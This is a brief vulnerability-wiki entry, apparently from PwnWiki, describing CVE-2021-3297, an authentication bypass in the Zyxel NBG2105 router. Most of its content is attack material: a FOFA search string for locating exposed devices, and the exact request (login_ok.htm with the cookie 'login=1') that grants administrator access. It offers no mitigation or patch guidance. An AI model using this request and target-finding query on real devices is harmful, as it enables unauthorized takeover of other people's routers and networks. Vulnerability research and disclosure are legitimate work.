Loading
0

CVE-2021-3297 Zyxel NBG2105 身份验证绕过漏洞/en

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

Vulnerability Impact

Zyxel NBG2105

FOFA

app="ZyXEL-NBG2105"

Xnip2021-04-06 09-32-28.jpg

The front-end file /js/util_gw.js has the front-end verification of the Cookie login parameter.

If you request the following, you will be redirected to the home.htm page as an administrator. 

http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;

Xnip2021-04-06 09-36-42.jpg

PWNWIK.COM==免费、自由、人人可编辑的漏洞库